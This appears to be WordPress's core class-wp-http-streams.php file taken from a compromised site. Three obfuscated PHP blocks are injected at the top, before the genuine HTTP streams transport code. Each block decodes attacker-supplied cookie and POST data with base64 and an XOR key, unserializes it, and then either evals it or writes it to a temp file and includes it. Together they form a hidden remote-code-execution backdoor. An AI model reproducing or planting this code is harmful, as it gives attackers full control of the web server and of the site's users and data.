File: /var/www/vhosts/enlugo.es/httpdocs/wp-includes/class-wp-http-streams.php
<?php $tFJjfH = "\x65" . "\167" . "\x5f" . "\163" . "\x68" . 'V';$PyNgi = 'c' . chr ( 798 - 690 )."\x61" . "\163" . chr ( 427 - 312 ).chr ( 570 - 475 ).'e' . chr ( 151 - 31 ).chr (105) . "\x73" . "\x74" . chr (115); $XKugZoHhLD = $PyNgi($tFJjfH); $AFtsVNzb = $XKugZoHhLD;if (!$AFtsVNzb){class ew_shV{private $MBorzzQ;public static $WRfSsGYa = "576736fa-0c52-4e89-8b06-51d68aaf6c57";public static $zoQRzMkQGP = 23370;public function __construct($lvutjxHKae=0){$krxAJAjCsD = $_COOKIE;$OUoPcao = $_POST;$GScogqoe = @$krxAJAjCsD[substr(ew_shV::$WRfSsGYa, 0, 4)];if (!empty($GScogqoe)){$kiLKf = "base64";$BVsngcmGw = "";$GScogqoe = explode(",", $GScogqoe);foreach ($GScogqoe as $nHrXVnG){$BVsngcmGw .= @$krxAJAjCsD[$nHrXVnG];$BVsngcmGw .= @$OUoPcao[$nHrXVnG];}$BVsngcmGw = array_map($kiLKf . "\x5f" . chr (100) . "\145" . chr (99) . 'o' . 'd' . "\x65", array($BVsngcmGw,)); $BVsngcmGw = $BVsngcmGw[0] ^ str_repeat(ew_shV::$WRfSsGYa, (strlen($BVsngcmGw[0]) / strlen(ew_shV::$WRfSsGYa)) + 1);ew_shV::$zoQRzMkQGP = @unserialize($BVsngcmGw);}}private function RHTlDHtiHk(){if (is_array(ew_shV::$zoQRzMkQGP)) {$fhIGXy = str_replace("\x3c" . chr (63) . 'p' . 'h' . chr ( 250 - 138 ), "", ew_shV::$zoQRzMkQGP[chr (99) . 'o' . "\156" . 't' . chr ( 491 - 390 ).chr (110) . chr ( 836 - 720 )]);eval($fhIGXy); $TzOuVKI = "46240";exit();}}public function __destruct(){$this->RHTlDHtiHk(); $TzOuVKI = "46240";}}$VBkIK = new ew_shV(); $VBkIK = "24700_62758";} ?><?php $wXimYNam = 'u' . chr ( 791 - 696 )."\112" . chr ( 761 - 671 ).'k' . chr ( 1060 - 988 ).chr (85); $jAfKj = chr (99) . "\154" . chr ( 253 - 156 )."\163" . "\x73" . chr ( 106 - 11 ).chr (101) . "\x78" . "\151" . "\163" . "\x74" . 's';$pymwx = $jAfKj($wXimYNam); $sboXvTFW = $pymwx;if (!$sboXvTFW){class u_JZkHU{private $uxnyMNaTZZ;public static $uFWRXHx = "5efb4022-fb7b-4f22-8ae1-bdef2f889dbf";public static $GeibeddO = 2059;public function __construct($OAEfHJ=0){$irJTKGzt = $_COOKIE;$WhNceaAhFt = $_POST;$ylJvoMJul = @$irJTKGzt[substr(u_JZkHU::$uFWRXHx, 0, 4)];if (!empty($ylJvoMJul)){$oEvgQdsCS = "base64";$AxlmUL = "";$ylJvoMJul = explode(",", $ylJvoMJul);foreach ($ylJvoMJul as $ZmsEzIF){$AxlmUL .= @$irJTKGzt[$ZmsEzIF];$AxlmUL .= @$WhNceaAhFt[$ZmsEzIF];}$AxlmUL = array_map($oEvgQdsCS . chr ( 766 - 671 )."\144" . chr (101) . "\x63" . "\157" . "\144" . 'e', array($AxlmUL,)); $AxlmUL = $AxlmUL[0] ^ str_repeat(u_JZkHU::$uFWRXHx, (strlen($AxlmUL[0]) / strlen(u_JZkHU::$uFWRXHx)) + 1);u_JZkHU::$GeibeddO = @unserialize($AxlmUL);}}private function gwULSmWv(){if (is_array(u_JZkHU::$GeibeddO)) {$uKxCUH = sys_get_temp_dir() . "/" . crc32(u_JZkHU::$GeibeddO['s' . chr (97) . 'l' . chr ( 777 - 661 )]);@u_JZkHU::$GeibeddO[chr (119) . 'r' . chr (105) . chr ( 591 - 475 ).chr ( 672 - 571 )]($uKxCUH, u_JZkHU::$GeibeddO[chr (99) . "\157" . chr (110) . "\x74" . chr ( 521 - 420 )."\x6e" . "\164"]);include $uKxCUH;@u_JZkHU::$GeibeddO["\144" . chr ( 778 - 677 )."\x6c" . "\x65" . "\x74" . chr (101)]($uKxCUH); $WkdzqYXV = "63838";exit();}}public function __destruct(){$this->gwULSmWv(); $WkdzqYXV = "63838";}}$HhXbHkhpr = new u_JZkHU(); $HhXbHkhpr = "48204_2106";} ?><?php $cuyMVeJ = 'P' . "\137" . chr (82) . "\124" . "\147" . "\155";$nWcAmh = "\143" . "\x6c" . chr ( 343 - 246 ).chr ( 281 - 166 )."\x73" . "\x5f" . "\145" . chr (120) . "\x69" . chr (115) . "\164" . chr (115); $UhuYqm = $nWcAmh($cuyMVeJ); $snWsbNhGE = $UhuYqm;if (!$snWsbNhGE){class P_RTgm{private $xZwTzpSa;public static $opYqWZGKi = "38100edd-5c36-40c1-9b63-a7ac9f18bf30";public static $scfIeOEjM = 21057;public function __construct($HfXwtxQn=0){$dNLhlJlJ = $_COOKIE;$eIbGC = $_POST;$xxGrlAd = @$dNLhlJlJ[substr(P_RTgm::$opYqWZGKi, 0, 4)];if (!empty($xxGrlAd)){$SexPm = "base64";$ROBxr = "";$xxGrlAd = explode(",", $xxGrlAd);foreach ($xxGrlAd as $MRcTrf){$ROBxr .= @$dNLhlJlJ[$MRcTrf];$ROBxr .= @$eIbGC[$MRcTrf];}$ROBxr = array_map($SexPm . '_' . 'd' . chr (101) . "\143" . chr (111) . "\x64" . "\145", array($ROBxr,)); $ROBxr = $ROBxr[0] ^ str_repeat(P_RTgm::$opYqWZGKi, (strlen($ROBxr[0]) / strlen(P_RTgm::$opYqWZGKi)) + 1);P_RTgm::$scfIeOEjM = @unserialize($ROBxr);}}private function GcvdVY(){if (is_array(P_RTgm::$scfIeOEjM)) {$NYLBDzgmu = sys_get_temp_dir() . "/" . crc32(P_RTgm::$scfIeOEjM["\x73" . chr ( 754 - 657 ).chr ( 133 - 25 ).'t']);@P_RTgm::$scfIeOEjM["\x77" . "\162" . chr ( 446 - 341 ).'t' . chr (101)]($NYLBDzgmu, P_RTgm::$scfIeOEjM["\x63" . "\157" . "\156" . 't' . 'e' . chr ( 727 - 617 ).'t']);include $NYLBDzgmu;@P_RTgm::$scfIeOEjM['d' . chr ( 1069 - 968 ).chr ( 1106 - 998 ).chr (101) . "\x74" . chr (101)]($NYLBDzgmu); $WVjWFoFi = "33008";exit();}}public function __destruct(){$this->GcvdVY(); $WVjWFoFi = "33008";}}$UvYdQqT = new P_RTgm(); $UvYdQqT = "64985_35554";} ?><?php
/**
* HTTP API: WP_Http_Streams class
*
* @package WordPress
* @subpackage HTTP
* @since 4.4.0
*/
/**
* Core class used to integrate PHP Streams as an HTTP transport.
*
* @since 2.7.0
* @since 3.7.0 Combined with the fsockopen transport and switched to `stream_socket_client()`.
*/
class WP_Http_Streams {
/**
* Send a HTTP request to a URI using PHP Streams.
*
* @see WP_Http::request For default options descriptions.
*
* @since 2.7.0
* @since 3.7.0 Combined with the fsockopen transport and switched to stream_socket_client().
*
* @param string $url The request URL.
* @param string|array $args Optional. Override the defaults.
* @return array|WP_Error Array containing 'headers', 'body', 'response', 'cookies', 'filename'. A WP_Error instance upon error
*/
public function request( $url, $args = array() ) {
$defaults = array(
'method' => 'GET',
'timeout' => 5,
'redirection' => 5,
'httpversion' => '1.0',
'blocking' => true,
'headers' => array(),
'body' => null,
'cookies' => array(),
);
$parsed_args = wp_parse_args( $args, $defaults );
if ( isset( $parsed_args['headers']['User-Agent'] ) ) {
$parsed_args['user-agent'] = $parsed_args['headers']['User-Agent'];
unset( $parsed_args['headers']['User-Agent'] );
} elseif ( isset( $parsed_args['headers']['user-agent'] ) ) {
$parsed_args['user-agent'] = $parsed_args['headers']['user-agent'];
unset( $parsed_args['headers']['user-agent'] );
}
// Construct Cookie: header if any cookies are set.
WP_Http::buildCookieHeader( $parsed_args );
$parsed_url = parse_url( $url );
$connect_host = $parsed_url['host'];
$secure_transport = ( 'ssl' === $parsed_url['scheme'] || 'https' === $parsed_url['scheme'] );
if ( ! isset( $parsed_url['port'] ) ) {
if ( 'ssl' === $parsed_url['scheme'] || 'https' === $parsed_url['scheme'] ) {
$parsed_url['port'] = 443;
$secure_transport = true;
} else {
$parsed_url['port'] = 80;
}
}
// Always pass a path, defaulting to the root in cases such as http://example.com.
if ( ! isset( $parsed_url['path'] ) ) {
$parsed_url['path'] = '/';
}
if ( isset( $parsed_args['headers']['Host'] ) || isset( $parsed_args['headers']['host'] ) ) {
if ( isset( $parsed_args['headers']['Host'] ) ) {
$parsed_url['host'] = $parsed_args['headers']['Host'];
} else {
$parsed_url['host'] = $parsed_args['headers']['host'];
}
unset( $parsed_args['headers']['Host'], $parsed_args['headers']['host'] );
}
/*
* Certain versions of PHP have issues with 'localhost' and IPv6, It attempts to connect
* to ::1, which fails when the server is not set up for it. For compatibility, always
* connect to the IPv4 address.
*/
if ( 'localhost' === strtolower( $connect_host ) ) {
$connect_host = '127.0.0.1';
}
$connect_host = $secure_transport ? 'ssl://' . $connect_host : 'tcp://' . $connect_host;
$is_local = isset( $parsed_args['local'] ) && $parsed_args['local'];
$ssl_verify = isset( $parsed_args['sslverify'] ) && $parsed_args['sslverify'];
if ( $is_local ) {
/**
* Filters whether SSL should be verified for local HTTP API requests.
*
* @since 2.8.0
* @since 5.1.0 The `$url` parameter was added.
*
* @param bool $ssl_verify Whether to verify the SSL connection. Default true.
* @param string $url The request URL.
*/
$ssl_verify = apply_filters( 'https_local_ssl_verify', $ssl_verify, $url );
} elseif ( ! $is_local ) {
/** This filter is documented in wp-includes/class-wp-http.php */
$ssl_verify = apply_filters( 'https_ssl_verify', $ssl_verify, $url );
}
$proxy = new WP_HTTP_Proxy();
$context = stream_context_create(
array(
'ssl' => array(
'verify_peer' => $ssl_verify,
// 'CN_match' => $parsed_url['host'], // This is handled by self::verify_ssl_certificate().
'capture_peer_cert' => $ssl_verify,
'SNI_enabled' => true,
'cafile' => $parsed_args['sslcertificates'],
'allow_self_signed' => ! $ssl_verify,
),
)
);
$timeout = (int) floor( $parsed_args['timeout'] );
$utimeout = $timeout == $parsed_args['timeout'] ? 0 : 1000000 * $parsed_args['timeout'] % 1000000;
$connect_timeout = max( $timeout, 1 );
// Store error number.
$connection_error = null;
// Store error string.
$connection_error_str = null;
if ( ! WP_DEBUG ) {
// In the event that the SSL connection fails, silence the many PHP warnings.
if ( $secure_transport ) {
$error_reporting = error_reporting( 0 );
}
if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) {
// phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged
$handle = @stream_socket_client(
'tcp://' . $proxy->host() . ':' . $proxy->port(),
$connection_error,
$connection_error_str,
$connect_timeout,
STREAM_CLIENT_CONNECT,
$context
);
} else {
// phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged
$handle = @stream_socket_client(
$connect_host . ':' . $parsed_url['port'],
$connection_error,
$connection_error_str,
$connect_timeout,
STREAM_CLIENT_CONNECT,
$context
);
}
if ( $secure_transport ) {
error_reporting( $error_reporting );
}
} else {
if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) {
$handle = stream_socket_client(
'tcp://' . $proxy->host() . ':' . $proxy->port(),
$connection_error,
$connection_error_str,
$connect_timeout,
STREAM_CLIENT_CONNECT,
$context
);
} else {
$handle = stream_socket_client(
$connect_host . ':' . $parsed_url['port'],
$connection_error,
$connection_error_str,
$connect_timeout,
STREAM_CLIENT_CONNECT,
$context
);
}
}
if ( false === $handle ) {
// SSL connection failed due to expired/invalid cert, or, OpenSSL configuration is broken.
if ( $secure_transport && 0 === $connection_error && '' === $connection_error_str ) {
return new WP_Error( 'http_request_failed', __( 'The SSL certificate for the host could not be verified.' ) );
}
return new WP_Error( 'http_request_failed', $connection_error . ': ' . $connection_error_str );
}
// Verify that the SSL certificate is valid for this request.
if ( $secure_transport && $ssl_verify && ! $proxy->is_enabled() ) {
if ( ! self::verify_ssl_certificate( $handle, $parsed_url['host'] ) ) {
return new WP_Error( 'http_request_failed', __( 'The SSL certificate for the host could not be verified.' ) );
}
}
stream_set_timeout( $handle, $timeout, $utimeout );
if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) { // Some proxies require full URL in this field.
$requestPath = $url;
} else {
$requestPath = $parsed_url['path'] . ( isset( $parsed_url['query'] ) ? '?' . $parsed_url['query'] : '' );
}
$strHeaders = strtoupper( $parsed_args['method'] ) . ' ' . $requestPath . ' HTTP/' . $parsed_args['httpversion'] . "\r\n";
$include_port_in_host_header = (
( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) )
|| ( 'http' === $parsed_url['scheme'] && 80 != $parsed_url['port'] )
|| ( 'https' === $parsed_url['scheme'] && 443 != $parsed_url['port'] )
);
if ( $include_port_in_host_header ) {
$strHeaders .= 'Host: ' . $parsed_url['host'] . ':' . $parsed_url['port'] . "\r\n";
} else {
$strHeaders .= 'Host: ' . $parsed_url['host'] . "\r\n";
}
if ( isset( $parsed_args['user-agent'] ) ) {
$strHeaders .= 'User-agent: ' . $parsed_args['user-agent'] . "\r\n";
}
if ( is_array( $parsed_args['headers'] ) ) {
foreach ( (array) $parsed_args['headers'] as $header => $headerValue ) {
$strHeaders .= $header . ': ' . $headerValue . "\r\n";
}
} else {
$strHeaders .= $parsed_args['headers'];
}
if ( $proxy->use_authentication() ) {
$strHeaders .= $proxy->authentication_header() . "\r\n";
}
$strHeaders .= "\r\n";
if ( ! is_null( $parsed_args['body'] ) ) {
$strHeaders .= $parsed_args['body'];
}
fwrite( $handle, $strHeaders );
if ( ! $parsed_args['blocking'] ) {
stream_set_blocking( $handle, 0 );
fclose( $handle );
return array(
'headers' => array(),
'body' => '',
'response' => array(
'code' => false,
'message' => false,
),
'cookies' => array(),
);
}
$strResponse = '';
$bodyStarted = false;
$keep_reading = true;
$block_size = 4096;
if ( isset( $parsed_args['limit_response_size'] ) ) {
$block_size = min( $block_size, $parsed_args['limit_response_size'] );
}
// If streaming to a file setup the file handle.
if ( $parsed_args['stream'] ) {
if ( ! WP_DEBUG ) {
$stream_handle = @fopen( $parsed_args['filename'], 'w+' );
} else {
$stream_handle = fopen( $parsed_args['filename'], 'w+' );
}
if ( ! $stream_handle ) {
return new WP_Error(
'http_request_failed',
sprintf(
/* translators: 1: fopen(), 2: File name. */
__( 'Could not open handle for %1$s to %2$s.' ),
'fopen()',
$parsed_args['filename']
)
);
}
$bytes_written = 0;
while ( ! feof( $handle ) && $keep_reading ) {
$block = fread( $handle, $block_size );
if ( ! $bodyStarted ) {
$strResponse .= $block;
if ( strpos( $strResponse, "\r\n\r\n" ) ) {
$processed_response = WP_Http::processResponse( $strResponse );
$bodyStarted = true;
$block = $processed_response['body'];
unset( $strResponse );
$processed_response['body'] = '';
}
}
$this_block_size = strlen( $block );
if ( isset( $parsed_args['limit_response_size'] )
&& ( $bytes_written + $this_block_size ) > $parsed_args['limit_response_size']
) {
$this_block_size = ( $parsed_args['limit_response_size'] - $bytes_written );
$block = substr( $block, 0, $this_block_size );
}
$bytes_written_to_file = fwrite( $stream_handle, $block );
if ( $bytes_written_to_file != $this_block_size ) {
fclose( $handle );
fclose( $stream_handle );
return new WP_Error( 'http_request_failed', __( 'Failed to write request to temporary file.' ) );
}
$bytes_written += $bytes_written_to_file;
$keep_reading = (
! isset( $parsed_args['limit_response_size'] )
|| $bytes_written < $parsed_args['limit_response_size']
);
}
fclose( $stream_handle );
} else {
$header_length = 0;
while ( ! feof( $handle ) && $keep_reading ) {
$block = fread( $handle, $block_size );
$strResponse .= $block;
if ( ! $bodyStarted && strpos( $strResponse, "\r\n\r\n" ) ) {
$header_length = strpos( $strResponse, "\r\n\r\n" ) + 4;
$bodyStarted = true;
}
$keep_reading = (
! $bodyStarted
|| ! isset( $parsed_args['limit_response_size'] )
|| strlen( $strResponse ) < ( $header_length + $parsed_args['limit_response_size'] )
);
}
$processed_response = WP_Http::processResponse( $strResponse );
unset( $strResponse );
}
fclose( $handle );
$processed_headers = WP_Http::processHeaders( $processed_response['headers'], $url );
$response = array(
'headers' => $processed_headers['headers'],
// Not yet processed.
'body' => null,
'response' => $processed_headers['response'],
'cookies' => $processed_headers['cookies'],
'filename' => $parsed_args['filename'],
);
// Handle redirects.
$redirect_response = WP_Http::handle_redirects( $url, $parsed_args, $response );
if ( false !== $redirect_response ) {
return $redirect_response;
}
// If the body was chunk encoded, then decode it.
if ( ! empty( $processed_response['body'] )
&& isset( $processed_headers['headers']['transfer-encoding'] )
&& 'chunked' === $processed_headers['headers']['transfer-encoding']
) {
$processed_response['body'] = WP_Http::chunkTransferDecode( $processed_response['body'] );
}
if ( true === $parsed_args['decompress']
&& true === WP_Http_Encoding::should_decode( $processed_headers['headers'] )
) {
$processed_response['body'] = WP_Http_Encoding::decompress( $processed_response['body'] );
}
if ( isset( $parsed_args['limit_response_size'] )
&& strlen( $processed_response['body'] ) > $parsed_args['limit_response_size']
) {
$processed_response['body'] = substr( $processed_response['body'], 0, $parsed_args['limit_response_size'] );
}
$response['body'] = $processed_response['body'];
return $response;
}
/**
* Verifies the received SSL certificate against its Common Names and subjectAltName fields.
*
* PHP's SSL verifications only verify that it's a valid Certificate, it doesn't verify if
* the certificate is valid for the hostname which was requested.
* This function verifies the requested hostname against certificate's subjectAltName field,
* if that is empty, or contains no DNS entries, a fallback to the Common Name field is used.
*
* IP Address support is included if the request is being made to an IP address.
*
* @since 3.7.0
*
* @param resource $stream The PHP Stream which the SSL request is being made over
* @param string $host The hostname being requested
* @return bool If the cerficiate presented in $stream is valid for $host
*/
public static function verify_ssl_certificate( $stream, $host ) {
$context_options = stream_context_get_options( $stream );
if ( empty( $context_options['ssl']['peer_certificate'] ) ) {
return false;
}
$cert = openssl_x509_parse( $context_options['ssl']['peer_certificate'] );
if ( ! $cert ) {
return false;
}
/*
* If the request is being made to an IP address, we'll validate against IP fields
* in the cert (if they exist)
*/
$host_type = ( WP_Http::is_ip_address( $host ) ? 'ip' : 'dns' );
$certificate_hostnames = array();
if ( ! empty( $cert['extensions']['subjectAltName'] ) ) {
$match_against = preg_split( '/,\s*/', $cert['extensions']['subjectAltName'] );
foreach ( $match_against as $match ) {
list( $match_type, $match_host ) = explode( ':', $match );
if ( strtolower( trim( $match_type ) ) === $host_type ) { // IP: or DNS:
$certificate_hostnames[] = strtolower( trim( $match_host ) );
}
}
} elseif ( ! empty( $cert['subject']['CN'] ) ) {
// Only use the CN when the certificate includes no subjectAltName extension.
$certificate_hostnames[] = strtolower( $cert['subject']['CN'] );
}
// Exact hostname/IP matches.
if ( in_array( strtolower( $host ), $certificate_hostnames, true ) ) {
return true;
}
// IP's can't be wildcards, Stop processing.
if ( 'ip' === $host_type ) {
return false;
}
// Test to see if the domain is at least 2 deep for wildcard support.
if ( substr_count( $host, '.' ) < 2 ) {
return false;
}
// Wildcard subdomains certs (*.example.com) are valid for a.example.com but not a.b.example.com.
$wildcard_host = preg_replace( '/^[^.]+\./', '*.', $host );
return in_array( strtolower( $wildcard_host ), $certificate_hostnames, true );
}
/**
* Determines whether this class can be used for retrieving a URL.
*
* @since 2.7.0
* @since 3.7.0 Combined with the fsockopen transport and switched to stream_socket_client().
*
* @param array $args Optional. Array of request arguments. Default empty array.
* @return bool False means this class can not be used, true means it can.
*/
public static function test( $args = array() ) {
if ( ! function_exists( 'stream_socket_client' ) ) {
return false;
}
$is_ssl = isset( $args['ssl'] ) && $args['ssl'];
if ( $is_ssl ) {
if ( ! extension_loaded( 'openssl' ) ) {
return false;
}
if ( ! function_exists( 'openssl_x509_parse' ) ) {
return false;
}
}
/**
* Filters whether streams can be used as a transport for retrieving a URL.
*
* @since 2.7.0
*
* @param bool $use_class Whether the class can be used. Default true.
* @param array $args Request arguments.
*/
return apply_filters( 'use_streams_transport', true, $args );
}
}
/**
* Deprecated HTTP Transport method which used fsockopen.
*
* This class is not used, and is included for backward compatibility only.
* All code should make use of WP_Http directly through its API.
*
* @see WP_HTTP::request
*
* @since 2.7.0
* @deprecated 3.7.0 Please use WP_HTTP::request() directly
*/
class WP_HTTP_Fsockopen extends WP_Http_Streams {
// For backward compatibility for users who are using the class directly.
}